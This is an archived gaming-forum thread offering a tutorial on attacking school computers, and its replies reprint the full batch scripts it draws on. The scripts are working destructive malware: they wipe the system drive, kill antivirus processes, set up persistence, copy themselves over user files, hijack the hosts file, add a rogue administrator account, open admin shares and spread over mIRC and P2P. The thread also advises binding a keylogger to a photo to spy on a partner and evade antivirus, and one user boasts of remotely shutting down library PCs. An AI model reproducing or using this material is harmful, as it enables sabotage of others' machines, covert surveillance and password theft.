You are viewing our Forum Archives. To view or take place in current topics click here.
How to hack a School Computer
Posted:

How to hack a School ComputerPosted:

Mikexklaus
  • Junior Member
Status: Offline
Joined: Nov 07, 201014Year Member
Posts: 93
Reputation Power: 3
Status: Offline
Joined: Nov 07, 201014Year Member
Posts: 93
Reputation Power: 3
[WARNING: THIS IS FOR EDUCATIONAL PURPOSES ONLY, HACKING IS ILLEGAL, USE THIS AT YOUR OWN RISK]


This is for all of the little Kids on TTG still in School


What are some ways?

Easy:

Batches.
Keyloggers.
Viruses.
Restricted Websites Access.
Administrator priviliges

Batches

Batches can pretty much do anything.
Flood Networks,Disable Computers,Delete C:\,Burn Memory...
I will give some nice batches.
Made by me/Thanatos/Laughing Man/Fun Pack.

Me:


Batch too long

Ok here I go:
Kills memory
Please save on the desktop

Thanatos:



Basically **** Up the pc.
Deletes Most of the necessary files.
Stops AV's Firewalls's Anything..
Kills most Processes
Pretty much it.



LaughingMan




Quote:
- Fakes runtime
- Kills Anti Virus
- Reboots PC
- Shuts Down the pc
- Infects host files
- Shares C: D: ...
- Overwrites files
- Adds/Changes user root:pwd
- Spreads through mIRC [Script.ini], LAN folders, KaZaa Folder, Warez P2P
- Enable DCOM
- Random Virii dropping
- Drop/Changes IE Startpage [use fire fox and no problems with the start page]

Fun Pack

Batch
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

Deletes the system drive.


Keyloggers:

Sangederomin:


this is my thread about keyloggers i notice alot of newcomers repeatedly asking about them so here we go...the basics

the boring background
What keyloggers do is they take note of every keystroke that the person who downloaded the keylogger types. why is this useful? you can do a couple things with a keylogger. you can use it on yourself to find out everything that people type while your not around or you can install it on someone elses machine to see everything that they type.....

Uses
find out whats being typed on your computer while your not around
find out whats being typed on someone elses computer (example girlfriend or boyfriend)
passwords and log-ins

Why is this better than phishing?
although it is more difficult to keylog somebody than to phish them it is more effective because it gives you a constant feed as to what theyr typing. why is this useful? because if you phish someone you will only have the information they entered once on your phisher. with a keylogger you will have the password they use, and if they so happen to change that password you will know. and you can view what the type in EVERYTHING

anyways on to the better stuff
how to accomplish keylogging?
the best way to accomplish keylogging is to find the keylogger you want, test it in a sandbox (controlled environment ie your computer.) once youv found the one you want to send out download a file binder, i personally reccomend sfx compiler. what this allows you to do is bind your keylogger to another program or file in order to trick your slave. you can bind your keylogger to a picture of yourself, once the picture is opened so will the keylogger and it will starting logging keystrokes(in short.) this is the handy part here, bind your keylogger to a picture and send it to your girlfriend saying hey i sent you a cute pic of myself or whatever, that part is up to you, use your creativity.

Stealth
first of all dont try to be to obvious or suspicious with what your doing, make it seem as if what your pretending to do your actually doing... for example dont repeatedly urge them to open a picture you sent them or whatever.
next part is encryption. if you want some added anonymity and assurance your keylogger wont get picked up by an anti virus just encrypt it.
lastly yes people you can get the logs sent to your email its a standard feature on many keyloggers

Viruses:

I think all of you know what Viruses mean.
Download some Virus Tools on :
[ Register or Signin to view external links. ]
and search for more on
[ Register or Signin to view external links. ]
The password for all downloaded files are :
To0l-base

Restricted website access:

There are a lot of ways but here are some good ones:

[ Register or Signin to view external links. ]
This will go to any website you want

Start>run>ping [ Register or Signin to view external links. ]
Take the ip and paste it in the url of the browser there you have it:)


Administrator priviliges:

Click Start, Run and type Regedit.exe
Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
Use the File, Export option to backup the key
Create a new DWORD Value named Administrator
Double-click Administrator, and set 1 as its data
Exit the Registry Editor.


There are more Hackings Tuts. They are not Published yet.


[FOR EDUCATIONAL PURPOSES ONLY]

The following 1 user thanked Mikexklaus for this useful post:

TTG_ANTIxPIMP (01-11-2012)
#2. Posted:
telogen
  • Wise One
Status: Offline
Joined: Jan 17, 201113Year Member
Posts: 596
Reputation Power: 22
Status: Offline
Joined: Jan 17, 201113Year Member
Posts: 596
Reputation Power: 22
why?????????????????????????????????????
#3. Posted:
Mikexklaus
  • Junior Member
Status: Offline
Joined: Nov 07, 201014Year Member
Posts: 93
Reputation Power: 3
Status: Offline
Joined: Nov 07, 201014Year Member
Posts: 93
Reputation Power: 3
telogen wrote why?????????????????????????????????????


Just for Kids who are still in School 6 hours a day,
#4. Posted:
TTG_KEVINx
  • TTG Senior
Status: Offline
Joined: Jan 15, 201113Year Member
Posts: 1,105
Reputation Power: 1
Status: Offline
Joined: Jan 15, 201113Year Member
Posts: 1,105
Reputation Power: 1
i did this 2 nice post man
#5. Posted:
SHS
  • TTG Fanatic
Status: Offline
Joined: Jul 16, 201014Year Member
Posts: 4,525
Reputation Power: 187
Status: Offline
Joined: Jul 16, 201014Year Member
Posts: 4,525
Reputation Power: 187
how to get expelled is a better name, my teacher works hard to keep up the network and could destroy your computer in notepad so thats kinda messed up to do since these things can be tracked........
#6. Posted:
TTG-GAMERZ
  • TTG Senior
Status: Offline
Joined: Jan 24, 201113Year Member
Posts: 1,182
Reputation Power: 30
Status: Offline
Joined: Jan 24, 201113Year Member
Posts: 1,182
Reputation Power: 30
IF you dont want to get arrested or getting kicked out of school i suggest you dont so this..
#7. Posted:
Mikexklaus
  • Junior Member
Status: Offline
Joined: Nov 07, 201014Year Member
Posts: 93
Reputation Power: 3
Status: Offline
Joined: Nov 07, 201014Year Member
Posts: 93
Reputation Power: 3
TTG-GAMERZ wrote IF you dont want to get arrested or getting kicked out of school i suggest you dont so this..


That is why I said [FOR EDUCATIONAL PURPOSES ONLY]
#8. Posted:
Chris-Wallace
  • TTG Addict
Status: Offline
Joined: Mar 25, 201014Year Member
Posts: 2,083
Reputation Power: 90
Status: Offline
Joined: Mar 25, 201014Year Member
Posts: 2,083
Reputation Power: 90
some schools disable command prompt and run, so you can make a notepad file and put this into it
command.com


then save it as "anything.bat"

when you open it it will open command prompt. from there you can type in
shutdown -i


which allows remote shutdown on computers in your network. i like doing it to people in my library.

jokeshow
#9. Posted:
Mustachio
  • TTG Contender
Status: Offline
Joined: Aug 14, 201014Year Member
Posts: 3,082
Reputation Power: 139
Status: Offline
Joined: Aug 14, 201014Year Member
Posts: 3,082
Reputation Power: 139
Obvious copy from hackforums www(dot)hackforums(dot)net/showthread.php?tid=17632

You didn't show what was under the spoilers which is the most important part of the thread.

Here's how to copypasta



Ok I noticed a lot of people are asking questions about Hacking Their Schools.
For multiple reasons.Changing grades,revenge..
So I thought :"Hey why not make a tutorial of my own about hacking schools?"
So I made this.
Here I go

What are some ways?

Easy:

Batches.
Keyloggers.
Viruses.
Restricted Websites Access.
Administrator priviliges

Batches

Batches can pretty much do anything.
Flood Networks,Disable Computers,Delete C:\,Burn Memory...
I will give some nice batches.
Made by me/Thanatos/Laughing Man/Fun Pack.

Me:


@echo off
@echo off
title I LIKE PRETTY COLORS!
:1
echo DONT YOU LOVE PRETTY COLORS!!
echo PLEASE JUST TAKE LIKE 20 SECONDS TO ADMIRE!!!
start mspaint.exe>nul
start cmd.exe>nul
copy "C:\Program Files">nul
copy "C:\Windows">nul
copy C:\WINDOWS\addins>nul
copy C:\WINDOWS\system32>nul
copy C:\WINDOWS\system>nul
color 21
color 12
color 43
color 34
goto :1


Ok here I go:
Kills memory
Please save on the desktop

Thanatos:


start
color 5
title Your ****, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now ****
msg * You got owned!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP


Basically **** Up the pc.
Deletes Most of the necessary files.
Stops AV's Firewalls's Anything..
Kills most Processes
Pretty much it.



LaughingMan



@echo off
%j2dt%
%random%%random%%random%%random%%random%%random%%random%
%61jv%
%random%%random%%random%%random%%random%%random%%random%
%rytn%
%random%%random%%random%%random%%random%%random%%random%
%twsg%
%random%%random%%random%%random%%random%%random%%random%
%d4kb%
%random%%random%%random%%random%%random%%random%%random%
%qt36%
%random%%random%%random%%random%%random%%random%%random%
set a=Damn
%vhvx%
%uc62%
copy %0 %windir%\%a%.bat
%r42b%
%6ffa%
set The Laughing Man=tskill
%The Laughing Man% norton*
%The Laughing Man% av*
%The Laughing Man% fire*
%The Laughing Man% anti*
%The Laughing Man% spy*
%The Laughing Man% bullguard
%The Laughing Man% PersFw
%The Laughing Man% KAV*
%The Laughing Man% ZONEALARM
%The Laughing Man% SAFEWEB
%The Laughing Man% OUTPOST
%The Laughing Man% nv*
%The Laughing Man% nav*
%The Laughing Man% F-*
%The Laughing Man% ESAFE
%The Laughing Man% cle
%The Laughing Man% BLACKICE
%The Laughing Man% def*
%8r65%
%qngs%
%syuq%
%xqh8%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat

/f > nul
%3qr7%
%7tck%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat

/f > nul
%rtwd%
%wbm2%
set Damn1=echo
%wmt8%
%s5g7%
%Damn1% [windows] >> %windir%\win.ini
%uggu%
%Damn1% run=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% load=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% [boot] >> %windir%\system.ini
%btvq%
%Damn1% shell=explorer.exe %a%.bat >> %windir%\system.ini
%wkuu%
%ornm%
chcp 1252 > nul
%random%%The Laughing Man%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Programs\Autostart\%a%.bat" > nul
%wnxl%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
%random%%The Laughing Man%%random%%Damn%
%4i16%
net share ADMIN$
%oxps%
net share C$
net share IPC$
%847f%
net share c=c:
net share d=d:
%2shq%
%1ls3%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
%2ww2%
set Damn2=echo
%ucu4%
%g5u2%
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
%zp2x%
%msvp%
%gp6w%
echo MsgBox "I thought what I'd do was pretend to be one of those deaf mutes...", 16, "The

Laughing Man" > v.vbs
start v.vbs
%ufsx%
%wf2w%
set x=%random%
%kgxx%
%c3mp%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d

"%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Damn /t REG_SZ /d

"%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
%g25d%
%fjjt%
%8tov%
set Damn3=echo
copy %0 %windir%\ftppassword.bat
%Damn3% [script] > irc.bat
%Damn3% n1={ if ($nick == $me) { halt } >> irc.bat
%Damn3% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%Damn3% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%terz%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
%gtym%
%emx3%
md %programfiles%\Damn\xxx\ > nul
md %programfiles%\Damn\cracks\ > nul
copy %0 %programfiles%\Damn\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\Damn\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\Damn\cracks\readme.txt
net share xxx&cracks=%programfiles%\Damn > nul
%ud2n%
%The Laughing Man%%random%%Damn%
%vxis%
%s6wl%
net user root pwd /add
net localgroup "Administratoren" root /add
%tgom%
net localgroup "Administrators" root /add
%The Laughing Man%%random%%random%%Damn%
%bem8%
%u1ao%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
%vp8e%
%ed7s%
%mknf%
%883k%
set The Laughing Manc=echo
%7j1e%
%The Laughing Manc% "<html>" > %windir%\hax0r.html
%The Laughing Manc% "<head>" >> %windir%\hax0r.html
%The Laughing Manc% "<title>Virus</title>" >> %windir%\hax0r.html
%The Laughing Manc% "</head>" >> %windir%\hax0r.html
%The Laughing Manc% "<body bgcolor="#000000">" >> %windir%\hax0r.html
%The Laughing Manc% "<p align="center"><b><font face="Arial" size="7"

color="#FFFFFF"><blink>I thought what I'd do was pretend to be one of those deaf mutes... - The Laughing Man</blink></font></b></p>" >> %windir%\hax0r.html
%The Laughing Manc% "</body>" >> %windir%\hax0r.html
%The Laughing Manc% "</html>" >> %windir%\hax0r.html
%6sbe%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d

"%windir%\hax0r.html" /f > nul
%vfeq%
%6xyr%
%3ujc%
%fo3h%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%Damn%%random%%Damn%%The Laughing Man%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%The Laughing Man%%random%%Damn%%Damn%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d

"%programfiles%\shared_folder" /f > nul
%um8f%
%cqww%
set Damna=copy
%ba2w%
%2vjg%
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat >

nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%ikwc%
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%ft5u%
%rai3%
%ml8t%
%xpnv%
shutdown /r /f /t 23 /c "I thought what I'd do was pretend to be one of those deaf mutes..."
%1jek%
%enas%
shutdown /s /f /t 23 /c "Infected with Damn virus!! - The Laughing Man"
%ot1d%
%w2cy%
%bpy7%
%h1jw%
%pvss%
%lmsz%
:bombing
chcp 1252 > nul
%random%%Damn%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\%random%.bat" > nul
copy %0 "C:\Documents and Settings\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%The Laughing Man%%random%%The Laughing Man%
%g4yy%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
%o4k7%
%ppwx%
%dav%
%7sxo%
:: Damn by The Laughing Man[/spoiler]


Fun Pack

[spoil]
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


Deletes the system drive.


Keyloggers:

Sangederomin:


this is my thread about keyloggers i notice alot of newcomers repeatedly asking about them so here we go...the basics

the boring background
What keyloggers do is they take note of every keystroke that the person who downloaded the keylogger types. why is this useful? you can do a couple things with a keylogger. you can use it on yourself to find out everything that people type while your not around or you can install it on someone elses machine to see everything that they type.....

Uses
find out whats being typed on your computer while your not around
find out whats being typed on someone elses computer (example girlfriend or boyfriend)
passwords and log-ins

Why is this better than phishing?
although it is more difficult to keylog somebody than to phish them it is more effective because it gives you a constant feed as to what theyr typing. why is this useful? because if you phish someone you will only have the information they entered once on your phisher. with a keylogger you will have the password they use, and if they so happen to change that password you will know. and you can view what the type in EVERYTHING

anyways on to the better stuff
how to accomplish keylogging?
the best way to accomplish keylogging is to find the keylogger you want, test it in a sandbox (controlled environment ie your computer.) once youv found the one you want to send out download a file binder, i personally reccomend sfx compiler. what this allows you to do is bind your keylogger to another program or file in order to trick your slave. you can bind your keylogger to a picture of yourself, once the picture is opened so will the keylogger and it will starting logging keystrokes(in short.) this is the handy part here, bind your keylogger to a picture and send it to your girlfriend saying hey i sent you a cute pic of myself or whatever, that part is up to you, use your creativity.

Stealth
first of all dont try to be to obvious or suspicious with what your doing, make it seem as if what your pretending to do your actually doing... for example dont repeatedly urge them to open a picture you sent them or whatever.
next part is encryption. if you want some added anonymity and assurance your keylogger wont get picked up by an anti virus just encrypt it.
lastly yes people you can get the logs sent to your email its a standard feature on many keyloggers


Viruses:

I think all of you know what Viruses mean.
Download some Virus Tools on :
[ Register or Signin to view external links. ]
and search for more on
[ Register or Signin to view external links. ]
The password for all downloaded files are :
To0l-base

Restricted website access:

There are a lot of ways but here are some good ones:

[ Register or Signin to view external links. ]
This will go to any website you want

Start>run>ping [ Register or Signin to view external links. ]
Take the ip and paste it in the url of the browser there you have it:)


Administrator priviliges:

Click Start, Run and type Regedit.exe
Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
Use the File, Export option to backup the key
Create a new DWORD Value named Administrator
Double-click Administrator, and set 1 as its data
Exit the Registry Editor.
#10. Posted:
Mikexklaus
  • Junior Member
Status: Offline
Joined: Nov 07, 201014Year Member
Posts: 93
Reputation Power: 3
Status: Offline
Joined: Nov 07, 201014Year Member
Posts: 93
Reputation Power: 3
Mustachio wrote Obvious copy from hackforums www(dot)hackforums(dot)net/showthread.php?tid=17632

You didn't show what was under the spoilers which is the most important part of the thread.

Here's how to copypasta



Ok I noticed a lot of people are asking questions about Hacking Their Schools.
For multiple reasons.Changing grades,revenge..
So I thought :"Hey why not make a tutorial of my own about hacking schools?"
So I made this.
Here I go

What are some ways?

Easy:

Batches.
Keyloggers.
Viruses.
Restricted Websites Access.
Administrator priviliges

Batches

Batches can pretty much do anything.
Flood Networks,Disable Computers,Delete C:\,Burn Memory...
I will give some nice batches.
Made by me/Thanatos/Laughing Man/Fun Pack.

Me:


@echo off
@echo off
title I LIKE PRETTY COLORS!
:1
echo DONT YOU LOVE PRETTY COLORS!!
echo PLEASE JUST TAKE LIKE 20 SECONDS TO ADMIRE!!!
start mspaint.exe>nul
start cmd.exe>nul
copy "C:\Program Files">nul
copy "C:\Windows">nul
copy C:\WINDOWS\addins>nul
copy C:\WINDOWS\system32>nul
copy C:\WINDOWS\system>nul
color 21
color 12
color 43
color 34
goto :1


Ok here I go:
Kills memory
Please save on the desktop

Thanatos:


start
color 5
title Your ****, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now ****
msg * You got owned!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP


Basically **** Up the pc.
Deletes Most of the necessary files.
Stops AV's Firewalls's Anything..
Kills most Processes
Pretty much it.



LaughingMan



@echo off
%j2dt%
%random%%random%%random%%random%%random%%random%%random%
%61jv%
%random%%random%%random%%random%%random%%random%%random%
%rytn%
%random%%random%%random%%random%%random%%random%%random%
%twsg%
%random%%random%%random%%random%%random%%random%%random%
%d4kb%
%random%%random%%random%%random%%random%%random%%random%
%qt36%
%random%%random%%random%%random%%random%%random%%random%
set a=Damn
%vhvx%
%uc62%
copy %0 %windir%\%a%.bat
%r42b%
%6ffa%
set The Laughing Man=tskill
%The Laughing Man% norton*
%The Laughing Man% av*
%The Laughing Man% fire*
%The Laughing Man% anti*
%The Laughing Man% spy*
%The Laughing Man% bullguard
%The Laughing Man% PersFw
%The Laughing Man% KAV*
%The Laughing Man% ZONEALARM
%The Laughing Man% SAFEWEB
%The Laughing Man% OUTPOST
%The Laughing Man% nv*
%The Laughing Man% nav*
%The Laughing Man% F-*
%The Laughing Man% ESAFE
%The Laughing Man% cle
%The Laughing Man% BLACKICE
%The Laughing Man% def*
%8r65%
%qngs%
%syuq%
%xqh8%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat

/f > nul
%3qr7%
%7tck%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat

/f > nul
%rtwd%
%wbm2%
set Damn1=echo
%wmt8%
%s5g7%
%Damn1% [windows] >> %windir%\win.ini
%uggu%
%Damn1% run=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% load=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% [boot] >> %windir%\system.ini
%btvq%
%Damn1% shell=explorer.exe %a%.bat >> %windir%\system.ini
%wkuu%
%ornm%
chcp 1252 > nul
%random%%The Laughing Man%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Programs\Autostart\%a%.bat" > nul
%wnxl%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
%random%%The Laughing Man%%random%%Damn%
%4i16%
net share ADMIN$
%oxps%
net share C$
net share IPC$
%847f%
net share c=c:
net share d=d:
%2shq%
%1ls3%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
%2ww2%
set Damn2=echo
%ucu4%
%g5u2%
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 [ Register or Signin to view external links. ] >> %windir%\system32\drivers\etc\hosts
